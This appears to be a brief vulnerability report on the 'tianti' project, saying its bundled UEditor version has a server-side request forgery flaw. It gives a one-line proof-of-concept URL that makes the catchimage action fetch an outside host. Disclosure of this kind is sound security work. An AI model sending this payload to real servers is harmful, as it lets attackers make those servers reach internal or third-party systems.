tianti
tianti copied to clipboard
SSRF vulnerability
Summary
UEditor has an SSRF vulnerability, and this project is using the vulnerable version in <=2.3.0.
POC
http://127.0.0.1:8080/tianti-module-admin/ueditor/controller.jsp?action=catchimage&source%5b%5d=http://d46ee8bf07.ipv6.bypass.eu.org